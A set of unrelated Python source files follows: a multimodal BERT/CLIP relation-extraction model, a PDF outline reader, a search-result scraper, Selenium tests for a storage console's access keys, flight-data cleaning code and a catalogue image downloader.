x):\n new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)\n x = x.view(*new_x_shape)\n return x.permute(0, 2, 1, 3)\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n mixed_query_layer = self.query(hidden_states)\n\n # If this is instantiated as a cross-attention module, the keys\n # and values come from an encoder; the attention mask needs to be\n # such that the encoder's padding tokens are not attended to.\n key_layer = self.transpose_for_scores(self.key(hidden_states))\n value_layer = self.transpose_for_scores(self.value(hidden_states))\n query_layer = self.transpose_for_scores(mixed_query_layer)\n\n qks = (key_layer, value_layer) if output_qks else None\n\n if past_key_values is not None:\n key_layer = torch.cat([past_key_values[0], key_layer], dim=2)\n value_layer = torch.cat([past_key_values[0], value_layer], dim=2)\n # Take the dot product between \"query\" and \"key\" to get the raw attention scores.\n attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))\n attention_scores = attention_scores / math.sqrt(self.attention_head_size)\n if attention_mask is not None:\n # Apply the attention mask is (precomputed for all layers in BertModel forward() function)\n bsz, nheads, length, dsize = past_key_values[0].size()\n visual_attention_mask = torch.ones((bsz, 1, 1, length)).to(attention_mask.device) # bsz, 12, len, 64\n attention_mask = torch.cat((visual_attention_mask, attention_mask), dim=-1)\n attention_scores = attention_scores + attention_mask\n # Normalize the 
attention scores to probabilities.\n attention_probs = nn.Softmax(dim=-1)(attention_scores)\n\n # This is actually dropping out entire tokens to attend to, which might\n # seem a bit unusual, but is taken from the original Transformer paper.\n attention_probs = self.dropout(attention_probs)\n\n # Mask heads if we want to\n if head_mask is not None:\n attention_probs = attention_probs * head_mask\n context_layer = torch.matmul(attention_probs, value_layer)\n\n context_layer = context_layer.permute(0, 2, 1, 3).contiguous()\n new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)\n context_layer = context_layer.view(*new_context_layer_shape) # bsz, 128, 768\n \n outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)\n\n return outputs, qks\n\n\nclass BertSelfOutput(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\nclass BertAttention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.self = BertSelfAttention(config)\n self.output = BertSelfOutput(config)\n self.pruned_heads = set()\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n self_outputs, qks = self.self(\n hidden_states,\n attention_mask,\n head_mask,\n output_attentions,\n visual_hidden_state,\n output_qks,\n current_layer,\n past_key_values,\n )\n attention_output = self.output(self_outputs[0], hidden_states)\n outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them\n return outputs, qks\n\n\nclass BertIntermediate(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.intermediate_size)\n if isinstance(config.hidden_act, str):\n self.intermediate_act_fn = ACT2FN[config.hidden_act]\n else:\n self.intermediate_act_fn = config.hidden_act\n\n def forward(self, hidden_states):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.intermediate_act_fn(hidden_states)\n return hidden_states\n\n\nclass BertOutput(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.intermediate_size, config.hidden_size)\n self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.dropout = nn.Dropout(config.hidden_dropout_prob)\n\n def forward(self, hidden_states, input_tensor):\n hidden_states = self.dense(hidden_states)\n hidden_states = self.dropout(hidden_states)\n hidden_states = self.LayerNorm(hidden_states + input_tensor)\n return hidden_states\n\n\nclass CLIPEncoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.embed_dim = config.hidden_size\n self.self_attn = CLIPAttention(config)\n self.layer_norm1 = nn.LayerNorm(self.embed_dim)\n self.mlp = CLIPMLP(config)\n self.layer_norm2 = nn.LayerNorm(self.embed_dim)\n\n def forward(\n self,\n hidden_states: torch.Tensor,\n output_attentions: bool = False,\n past_key_values: torch.Tensor = None,\n current_layer: int = None,\n output_qks = None\n ):\n 
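The cross-modal step in BertSelfAttention above prepends visual key/value states along the sequence axis and widens the padding mask to match (note the value branch concatenates past_key_values[0] where past_key_values[1] appears intended). A minimal shape sketch of the mask widening, with hypothetical sizes (61 = 1 class + 48 aux + 12 rcnn tokens, as in CLIPVisionEmbeddings above) and zeros for the prepended positions so they are fully attended:

    import torch

    bsz, nheads, txt_len, vis_len = 2, 12, 128, 61  # hypothetical sizes

    # Extended text mask: 0.0 where attended, -10000.0 where padded.
    attention_mask = torch.zeros(bsz, 1, 1, txt_len)
    visual_attention_mask = torch.zeros(bsz, 1, 1, vis_len)
    attention_mask = torch.cat((visual_attention_mask, attention_mask), dim=-1)

    scores = torch.randn(bsz, nheads, txt_len, vis_len + txt_len)
    scores = scores + attention_mask  # broadcasts over heads and query positions
    print(scores.shape)  # torch.Size([2, 12, 128, 189])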
\"\"\"\n Args:\n hidden_states (:obj:`torch.FloatTensor`): input to the layer of shape :obj:`(seq_len, batch, embed_dim)`\n attention_mask (:obj:`torch.FloatTensor`): attention mask of size\n :obj:`(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values.\n layer_head_mask (:obj:`torch.FloatTensor`): mask for attention heads in a given layer of size\n :obj:`(config.encoder_attention_heads,)`.\n output_attentions (:obj:`bool`, `optional`):\n Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under\n returned tensors for more detail.\n \"\"\"\n residual = hidden_states\n\n hidden_states = self.layer_norm1(hidden_states)\n hidden_states, attn_weights, qks = self.self_attn(\n hidden_states=hidden_states,\n output_attentions=output_attentions,\n past_key_values=past_key_values,\n output_qks=output_qks,\n current_layer=current_layer,\n )\n hidden_states = residual + hidden_states\n\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.mlp(hidden_states)\n hidden_states = residual + hidden_states\n\n outputs = (hidden_states,)\n\n if output_attentions:\n outputs += (attn_weights,)\n \n if output_qks:\n outputs += (qks, )\n \n return outputs\n\n\nclass BertLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.chunk_size_feed_forward = config.chunk_size_feed_forward\n self.seq_len_dim = 1\n self.attention = BertAttention(config)\n self.add_cross_attention = config.add_cross_attention\n self.intermediate = BertIntermediate(config)\n self.output = BertOutput(config)\n\n def forward(\n self,\n hidden_states,\n attention_mask=None,\n head_mask=None,\n output_attentions=False,\n visual_hidden_state=None,\n output_qks=None,\n current_layer=None,\n past_key_values=None,\n ):\n # decoder uni-directional self-attention cached key/values tuple is at positions 1,2\n # self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None\n self_attention_outputs, qks = self.attention(\n hidden_states,\n attention_mask,\n head_mask,\n output_attentions=output_attentions,\n visual_hidden_state=visual_hidden_state,\n output_qks=output_qks,\n current_layer=current_layer,\n past_key_values=past_key_values,\n )\n attention_output = self_attention_outputs[0]\n\n outputs = self_attention_outputs[1:] # add self attentions if we output attention weights\n\n layer_output = apply_chunking_to_forward(\n self.feed_forward_chunk, self.chunk_size_feed_forward, self.seq_len_dim, attention_output\n )\n outputs = (layer_output,) + outputs\n if output_qks: \n outputs += (qks,)\n\n return outputs\n\n def feed_forward_chunk(self, attention_output):\n intermediate_output = self.intermediate(attention_output)\n layer_output = self.output(intermediate_output, attention_output)\n return layer_output\n\n\nclass IFAEncoder(nn.Module):\n def __init__(self, vision_config, text_config):\n super().__init__()\n self.vision_config = vision_config\n self.text_config = text_config\n\n self.vision_layers = nn.ModuleList([CLIPEncoderLayer(vision_config) for _ in range(vision_config.num_hidden_layers)])\n self.text_layer = nn.ModuleList([BertLayer(text_config) for _ in range(text_config.num_hidden_layers)])\n \n def forward(\n self,\n vision_embeds=None,\n text_embeds=None,\n attention_mask=None,\n head_mask=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n assert self.vision_config.num_hidden_layers == self.text_config.num_hidden_layers\n\n 
all_vision_hidden_states = () if output_hidden_states else None\n all_text_hidden_states = () if output_hidden_states else None\n all_vision_attentions = () if output_attentions else None\n all_text_attentions = () if output_attentions else None\n \n vision_hidden_states = vision_embeds\n text_hidden_states = text_embeds\n for idx in range(self.vision_config.num_hidden_layers):\n if output_hidden_states:\n all_vision_hidden_states = all_vision_hidden_states + (vision_hidden_states, )\n all_text_hidden_states = all_text_hidden_states + (text_hidden_states, )\n \n # vision\n # TODO: 9-12 layers past text as pkv to vision\n output_qks = True\n if idx == 0:\n bsz, length, dsize = text_embeds.size()\n visual_past_key_values = (text_embeds.view(bsz, 12, length, dsize//12),\n text_embeds.view(bsz, 12, length, dsize//12))\n else:\n visual_past_key_values = text_layer_output[-1]\n vision_layer_module = self.vision_layers[idx]\n vision_layer_output = vision_layer_module(\n vision_hidden_states,\n output_attentions=output_attentions,\n past_key_values=visual_past_key_values,\n current_layer=idx,\n output_qks=output_qks,\n )\n vision_hidden_states = vision_layer_output[0]\n\n # text\n # TODO: 9-12 layers past vison qks to text\n if idx == 0:\n bsz, length, dsize = vision_embeds.size()\n text_past_key_values = (vision_embeds.view(bsz, 12, length, dsize//12),\n vision_embeds.view(bsz, 12, length, dsize//12))\n else:\n text_past_key_values = vision_layer_output[-1]\n\n layer_head_mask = head_mask[idx] if head_mask is not None else None\n text_layer_module = self.text_layer[idx]\n text_layer_output = text_layer_module(\n text_hidden_states,\n attention_mask=attention_mask,\n head_mask=layer_head_mask,\n visual_hidden_state=None,\n past_key_values=text_past_key_values,\n output_attentions=output_attentions,\n output_qks=output_qks,\n current_layer=idx,\n )\n text_hidden_states = text_layer_output[0]\n if output_attentions:\n all_vision_attentions = all_vision_attentions + (vision_layer_output[1], )\n all_text_attentions = all_text_attentions + (text_layer_output[1], )\n \n if output_hidden_states:\n all_vision_hidden_states = all_vision_hidden_states + (vision_hidden_states, )\n all_text_hidden_states = all_text_hidden_states + (text_hidden_states, )\n \n if not return_dict:\n return tuple(\n v for v in [\n text_hidden_states,\n all_text_hidden_states,\n all_text_attentions,\n ] if v is not None)\n return BaseModelOutput(\n last_hidden_state=text_hidden_states, hidden_states=all_text_hidden_states, attentions=all_text_attentions\n )\n\n\nclass BertPooler(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def forward(self, hidden_states):\n # We \"pool\" the model by simply taking the hidden state corresponding\n # to the first token.\n first_token_tensor = hidden_states[:, 0]\n pooled_output = self.dense(first_token_tensor)\n pooled_output = self.activation(pooled_output)\n return pooled_output\n\n\nclass IFAModel(nn.Module):\n def __init__(self, vision_config, text_config, add_pooling_layer=True):\n super(IFAModel, self).__init__()\n # vision model\n self.vision_config = vision_config\n self.vision_embeddings = CLIPVisionEmbeddings(vision_config)\n self.vision_pre_layrnorm = nn.LayerNorm(vision_config.hidden_size)\n self.vision_post_layernorm = nn.LayerNorm(vision_config.hidden_size)\n\n # text model\n self.text_config = text_config\n self.text_embeddings = BertEmbeddings(text_config)\n 
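        # The pooler below (gated by add_pooling_layer) follows the BERT
        # convention: it takes the final hidden state of the first token and
        # passes it through a Linear + Tanh head.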
self.text_pooler = BertPooler(text_config) if add_pooling_layer else None\n\n # all\n self.encoder = IFAEncoder(vision_config, text_config)\n\n self.device = vision_config.device\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n position_ids=None,\n head_mask=None,\n \n pixel_values=None,\n aux_values=None, \n rcnn_values=None,\n output_attentions=None,\n output_hidden_states=None,\n return_dict=None,\n ):\n # pre vision\n vision_embedding_output = self.vision_embeddings(pixel_values, aux_values, rcnn_values)\n vision_embedding_output = self.vision_pre_layrnorm(vision_embedding_output)\n\n # pre text\n input_shape = input_ids.size()\n batch_size, seq_length = input_shape\n device = input_ids.device\n if attention_mask is None:\n attention_mask = torch.ones(((batch_size, seq_length)), device=device)\n if token_type_ids is None:\n raise ValueError(\"token_type_ids is None!\")\n\n extended_attention_mask: torch.Tensor = get_extended_attention_mask(attention_mask, input_shape, device)\n head_mask = get_head_mask(head_mask, self.text_config.num_hidden_layers) # [None]*12\n\n text_embedding_output = self.text_embeddings(\n input_ids=input_ids,\n position_ids=position_ids,\n token_type_ids=token_type_ids,\n )\n\n # all encoder\n encoder_outputs = self.encoder(\n vision_embeds=vision_embedding_output,\n text_embeds=text_embedding_output,\n attention_mask=extended_attention_mask,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n sequence_output = encoder_outputs[0]\n pooled_output = self.text_pooler(sequence_output) if self.text_pooler is not None else None\n\n if not return_dict:\n return (sequence_output, pooled_output) + encoder_outputs[1:]\n\n return BaseModelOutputWithPooling(\n last_hidden_state=sequence_output,\n pooler_output=pooled_output,\n hidden_states=encoder_outputs.hidden_states,\n attentions=encoder_outputs.attentions,\n )\n\n def _init_text_weights(self, module):\n \"\"\"Initialize the weights\"\"\"\n if isinstance(module, nn.Linear):\n # Slightly different from the TF version which uses truncated_normal for initialization\n # cf https://github.com/pytorch/pytorch/pull/5617\n module.weight.data.normal_(mean=0.0, std=self.text_config.initializer_range)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Embedding):\n module.weight.data.normal_(mean=0.0, std=self.text_config.initializer_range)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, nn.LayerNorm):\n module.bias.data.zero_()\n module.weight.data.fill_(1.0)\n\n def get_input_embeddings(self):\n return self.text_embeddings.word_embeddings\n\n def set_input_embeddings(self, value):\n self.text_embeddings.word_embeddings = value\n\n def resize_token_embeddings(self, new_num_tokens):\n old_embeddings = self.get_input_embeddings()\n new_embeddings = self._get_resized_embeddings(old_embeddings, new_num_tokens)\n self.set_input_embeddings(new_embeddings)\n\n def _get_resized_embeddings(\n self, old_embeddings: nn.Embedding, new_num_tokens: Optional[int] = None\n ) -> nn.Embedding:\n \"\"\"\n Build a resized Embedding Module from a provided token Embedding Module. Increasing the size will add newly\n initialized vectors at the end. 
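        For example, growing an 8-token embedding to 10 tokens copies the
        8 existing rows and appends 2 newly initialized ones.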
Reducing the size will remove vectors from the end\n\n Args:\n old_embeddings (:obj:`torch.nn.Embedding`):\n Old embeddings to be resized.\n new_num_tokens (:obj:`int`, `optional`):\n New number of tokens in the embedding matrix.\n\n Increasing the size will add newly initialized vectors at the end. Reducing the size will remove\n vectors from the end. If not provided or :obj:`None`, just returns a pointer to the input tokens\n :obj:`torch.nn.Embedding`` module of the model without doing anything.\n\n Return:\n :obj:`torch.nn.Embedding`: Pointer to the resized Embedding Module or the old Embedding Module if\n :obj:`new_num_tokens` is :obj:`None`\n \"\"\"\n if new_num_tokens is None:\n return old_embeddings\n else:\n old_num_tokens, old_embedding_dim = old_embeddings.weight.size()\n\n if old_num_tokens == new_num_tokens:\n return old_embeddings\n\n if not isinstance(old_embeddings, nn.Embedding):\n raise TypeError(\n f\"Old embeddings are of type {type(old_embeddings)}, which is not an instance of {nn.Embedding}.\"\n f\"You should either use a different resize function or make sure that `old_embeddings` are an instance of {nn.Embedding}.\"\n )\n\n # Build new embeddings\n new_embeddings = nn.Embedding(new_num_tokens, old_embedding_dim).to(\n self.device, dtype=old_embeddings.weight.dtype\n )\n\n # initialize all new embeddings (in particular added tokens)\n self._init_text_weights(new_embeddings)\n\n # Copy token embeddings from the previous weights\n\n # numbers of tokens to copy\n n = min(old_num_tokens, new_num_tokens)\n new_embeddings.weight.data[:n, :] = old_embeddings.weight.data[:n, :]\n\n return new_embeddings","sub_path":"src/deepke/relation_extraction/multimodal/models/modeling_IFA.py","file_name":"modeling_IFA.py","file_ext":"py","file_size_in_byte":35007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"329190699","text":"#! python3\nfrom sys import argv\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\n\ndef get_toc(pdf_path):\n infile = open(pdf_path, 'rb')\n parser = PDFParser(infile)\n document = PDFDocument(parser)\n\n toc = list()\n for (level,title,dest,a,structelem) in document.get_outlines():\n toc.append((level, title))\n\n return toc\n\nprint(get_toc(argv[1]))","sub_path":"pdf2txt.py","file_name":"pdf2txt.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570628837","text":"import requests\nfrom bs4 import BeautifulSoup\n\n##Commit 1\n\nresults = []\n\ndef extractUrl(text):\n html = str(text)\n startIndex = str(text).find(\"http\")\n\n endIndex = 0\n i = 0\n\n while(endIndex == 0):\n if (html[startIndex + i] == \"\\\"\") or (html[startIndex + i] == \"&\"):\n endIndex = startIndex + i\n else:\n i = i + 1\n\n\n return (html[startIndex:endIndex])\n\n\ndef getTitle(url):\n request = requests.get(url)\n parser = BeautifulSoup(request.text, 'html.parser')\n return parser.title.text\n\ndef traverse(index):\n query = input(\"Is this what you're looking for? 
[y/n] \\n\" + getTitle(results[index]) + \"\\n\" + \"Response: \")\n\n if query == \"y\":\n return (results[index])\n elif query == \"n\":\n if(index + 1 < len(results)):\n traverse(index + 1)\n elif query == \"exit\":\n return(\"bet\")\n\ndef start(name):\n #Command Line Input\n #name = input(\"Query: \")\n\n fill = name.replace(\" \", \"+\")\n\n page = requests.get('https://www.google.com/search?q=' + fill)\n\n try:\n soup = BeautifulSoup(page.text, 'html.parser')\n for link in soup.find_all(class_='g'):\n results.append(extractUrl(str(link)))\n\n return results\n #Uncoment for command line input\n #print(traverse(0))\n except:\n print(\"Done\")\n","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185780067","text":"from selenium import webdriver\nimport unittest\nfrom selenium.webdriver.common.by import By\nfrom loginpage import LoginPage\nfrom driver import WebDriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom groups import Groups\nfrom users import Users\nfrom accesskeys import Keys\ncommand_executor = \"http://127.0.0.1:4444/wd/hub\"\nimport time\nimport common\nimport base\n\nclass KeyTest(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.driver = WebDriver(desired_capabilities=DesiredCapabilities.CHROME,command_executor=command_executor)\n\t\tself.driver.get(common.URL)\n\t\tlogin_page = LoginPage(self.driver).open()\n\t\tlogin_page.login(common.USERNAME,common.PASSWORD)\n\t\tself.users_page = Users(self.driver)\n\t\tself.groups_page = Groups(self.driver).open()\n\t\tself.key_page = Keys(self.driver).open()\n\t\tprint('Welcome to Wasabi Access Keys page tests')\n\n\tdef test_create_key(self):\n\t\tprint(\"Create Key\")\n\n\t\taccessKey , secretKey = self.key_page.createKey()\n\n\t\ttable = self.key_page.getKeys()\n\n\t\tself.assertIsNotNone(accessKey in table, 'accessKey does not exist')\n\n\tdef test_delete_key(self):\n\t\tprint(\"Delete a specific key\")\n\n\t\taccessKey , secretKey = self.key_page.createKey()\n\t\taccessKey , secretKey = self.key_page.createKey()\n\n\t\tself.key_page.deleteKey(accessKey)\n\n\t\ttable = self.key_page.getKeys()\n\t\tself.assertIsNotNone(accessKey not in table, 'accessKey does exist')\n\n\tdef test_get_user_key(self):\n\t\tprint(\"get keys that belong to bolak2\")\t\n\n\t\tself.users_page.open()\n\t\taccessKey , secretKey = self.users_page.createUser('bolak2','API')\n\n\t\tself.key_page.open()\n\t\ttable = self.key_page.getUserKeys('bolak2')\n\n\t\tself.assertIsNotNone(accessKey in table, 'accessKey does not exist')\n\n\tdef test_delete_user_deletes_key(self):\n\t\tprint(\"Check if deleting bolak2 deletes its key\")\t\n\n\t\tself.users_page.open()\n\t\taccessKey , secretKey = self.users_page.createUser('bolak2','API')\n\t\tself.users_page.deleteUser('bolak2')\n\n\t\tself.key_page.open()\n\t\ttable = self.key_page.getKeys()\n\n\t\tself.assertIsNotNone(accessKey not in table, 'accessKey does exist')\t\t\t\t\n\t\t\t\t\n\t\n\n\tdef tearDown(self):\n\t\tself.key_page.deleteAllKeys()\n\t\tself.groups_page.deleteAllGroups()\n\t\tself.users_page.deleteAllUsers()\n\t\tself.driver.close()\n\nif __name__ == \"__main__\":\n\tunittest.main()\n","sub_path":"po/test_accesskeys.py","file_name":"test_accesskeys.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"73853924","text":"import 
pandas as pd\nimport numpy as np\nfrom utils.utils import transf_duration\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.feature_selection import VarianceThreshold\nfrom map import *\n\ndef clean_data(big_df):\n #Handling null values\n big_df['Total_Stops'] = big_df['Total_Stops'].fillna(value=big_df['Total_Stops'].mode()[0])\n big_df['Route'] = big_df['Route'].fillna(value=big_df['Route'].mode()[0])\n\n #Seperating Date_of_Journey column into date, month and year\n big_df['Date'] = big_df['Date_of_Journey'].str.split('/').str[0].astype(int)\n big_df['Month'] = big_df['Date_of_Journey'].str.split('/').str[1].astype(int)\n big_df['Year'] = big_df['Date_of_Journey'].str.split('/').str[2].astype(int)\n big_df.drop(['Date_of_Journey'],axis=1,inplace=True)\n\n #Extracting only the time part from Arrival_time feature\n big_df['Arrival_Time'] = big_df['Arrival_Time'].str.split(' ').str[0]\n\n #Seperating Arrival Time into Arrival Hour and Arrival minute\n big_df['Arrival_Hour'] = big_df['Arrival_Time'].str.split(':').str[0].astype(int)\n big_df['Arrival_Minute'] = big_df['Arrival_Time'].str.split(':').str[1].astype(int)\n\n #Seperating Departure time into Departure hour and Departure minute\n big_df['Departure_Hour'] = big_df['Dep_Time'].str.split(':').str[0].astype(int)\n big_df['Departure_Minute'] = big_df['Dep_Time'].str.split(':').str[1].astype(int)\n\n #Dropping the Arrival/Departure Time\n big_df.drop(['Arrival_Time','Dep_Time'],axis=1,inplace=True)\n\n #Handling route column\n big_df['Route_1'] = big_df['Route'].str.split('→ ').str[0] # Seperating route parameter into different columns\n big_df['Route_2'] = big_df['Route'].str.split('→ ').str[1]\n big_df['Route_3'] = big_df['Route'].str.split('→ ').str[2]\n big_df['Route_4'] = big_df['Route'].str.split('→ ').str[3]\n big_df['Route_5'] = big_df['Route'].str.split('→ ').str[4]\n\n big_df['Route_1'].fillna(\"None\", inplace=True) # Handling null values in the newly created\n big_df['Route_2'].fillna(\"None\", inplace=True)\n big_df['Route_3'].fillna(\"None\", inplace=True)\n big_df['Route_4'].fillna(\"None\", inplace=True)\n big_df['Route_5'].fillna(\"None\", inplace=True)\n\n #Dropping the original Route column\n big_df.drop(['Route'],axis=1,inplace=True)\n\n #Converting Duration into minutes\n big_df['Duration'] = big_df['Duration'].apply(transf_duration)\n\n return big_df\n\ndef encode_categorical(cleaned_data):\n cleaned_data['Route_1'] = cleaned_data['Route_1'].str.strip()\n cleaned_data['Route_2'] = cleaned_data['Route_2'].str.strip()\n cleaned_data['Route_3'] = cleaned_data['Route_3'].str.strip()\n cleaned_data['Route_4'] = cleaned_data['Route_4'].str.strip()\n cleaned_data['Route_5'] = cleaned_data['Route_5'].str.strip()\n\n #Encoding categorical variables using label encoding because there is some rank associated with them\n cleaned_data['Airline'] = cleaned_data['Airline'].map(dic_airline)\n cleaned_data['Source'] = cleaned_data['Source'].map(dic_source)\n cleaned_data['Destination'] = cleaned_data['Destination'].map(dic_destination)\n cleaned_data['Total_Stops'] = cleaned_data['Total_Stops'].map(dic_totalstops)\n cleaned_data['Additional_Info'] = cleaned_data['Additional_Info'].map(dic_addinfo)\n cleaned_data['Route_1'] = cleaned_data['Route_1'].map(dic_route1)\n cleaned_data['Route_2'] = cleaned_data['Route_2'].map(dic_route2)\n cleaned_data['Route_3'] = cleaned_data['Route_3'].map(dic_route3)\n cleaned_data['Route_4'] = cleaned_data['Route_4'].map(dic_route4)\n cleaned_data['Route_5'] = 
cleaned_data['Route_5'].map(dic_route5)\n return cleaned_data\n\ndef feature_sel(encoded_data):\n var_thres = VarianceThreshold(threshold=0)\n var_thres.fit(encoded_data)\n constant_columns = [column for column in encoded_data.columns\n if column not in encoded_data.columns[var_thres.get_support()]]\n encoded_data.drop(constant_columns, axis=1, inplace=True)\n return encoded_data","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326368186","text":"from selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom os import makedirs, listdir\nfrom os.path import exists, join\nimport img2pdf\nimport datetime\nimport urllib.request\nimport time\n# History Writer\nfrom download_scripts.history_writer import write_history_to_csv, check_history_in_csv\n\nclass catalogue(object):\n def __init__(self, name, date, url, web_name, save_folder, history_path):\n self.web_name = web_name.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.name = name.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.date = date.replace(\"/\",\" \").replace(\"|\",\" \").replace(\",\",\" \")\n self.url = url\n self.save_folder = save_folder\n self.history_path = history_path\n \n def __str__(self):\n return self.name + \" - \" + self.date + \" : \" + self.url\n \n def set_driver(self, web_driver):\n self.web_driver = web_driver\n \n def get_images(self):\n self.web_driver.get(self.url)\n \n date = self.web_driver.find_element_by_xpath(\"//p[@class='infoContainer__date']\")\n self.date = date.text.replace(\"/\",\"\")\n result_check = False\n while result_check == False:\n result_check = self.download_images()\n\n def download_images(self):\n img_folder = self.save_folder + \"/\" + self.web_name + \"/\" + self.date + \"/\" + self.name + \"/\"\n if check_history_in_csv(self.history_path, self.web_name, img_folder + self.name + \"_\" + self.date + \".pdf\") == False:\n if not exists(img_folder):\n makedirs(img_folder)\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='adOverlay']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='adContainer isAdPage']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n try:\n ad_div = self.web_driver.find_element_by_xpath(\"//div[@class='inPage ']\")\n self.web_driver.execute_script(\"arguments[0].remove()\",ad_div);\n except:\n pass\n\n img_list = []\n last_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']\")\n index = 0\n dup_first_last = False\n\n wait = WebDriverWait(self.web_driver, 5)\n \n max_page = int(self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']/span\").text.split(\" / \")[-1])\n \n while last_page_btn != None:\n try:\n last_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='lastPageButton']\")\n except:\n last_page_btn = None\n try:\n first_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='firstPageButton']\")\n except:\n first_page_btn = None\n\n if first_page_btn == None:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page 
page_index_0']\")))\n image = cata_page.find_element_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n elif last_page_btn == None:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page page_index_1']\")))\n image = cata_page.find_element_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n if image.get_attribute('src') == img_list[0]:\n dup_first_last = True\n break\n else:\n cata_page = wait.until(EC.presence_of_element_located((By.XPATH, \"//div[@class='catalog-page page_index_1']\")))\n images = cata_page.find_elements_by_xpath(\".//div[@class='responsive-image-wrapper']/img\")\n for image in images:\n if image.get_attribute('src') not in img_list and image.get_attribute('src').split(\"/\")[-2] != \"mini\":\n img_list.append(image.get_attribute('src'))\n \n time.sleep(3.5)\n next_page_btn = self.web_driver.find_element_by_xpath(\"//button[@id='nextPageButton']\")\n next_page_btn.click()\n\n for img_url in img_list:\n img_path = img_folder + \"page_\" + str(index).rjust(3, '0') + \".jpg\"\n index += 1\n urllib.request.urlretrieve(img_url, img_path)\n\n time.sleep(3)\n self.images_to_pdf(img_folder)\n else:\n return None\n \n if dup_first_last == False:\n if index != max_page:\n print(\"--------{0}--------\".format(self.web_name))\n print(\" \".join([self.date, self.name]))\n print(\"ERROR: Catalogue is not full of pages !!!\")\n print(\"Catalogue: {0} pages\".format(max_page))\n print(\"Downloaded: {0} pages\".format(index))\n result_check = False\n else:\n write_history_to_csv(self.history_path, self.web_name, [self.date, self.name, img_folder + self.name + \"_\" + self.date + \".pdf\"])\n result_check = True\n else:\n if (index + 1) != max_page:\n print(\"--------{0}--------\".format(self.web_name))\n print(\" \".join([self.date, self.name]))\n print(\"ERROR: Catalogue is not full of pages !!!\")\n print(\"Catalogue: {0} pages\".format(max_page))\n print(\"Downloaded: {0} pages\".format(index))\n result_check = False\n else:\n write_history_to_csv(self.history_path, self.web_name, [self.date, self.name, img_folder + self.name + \"_\" + self.date + 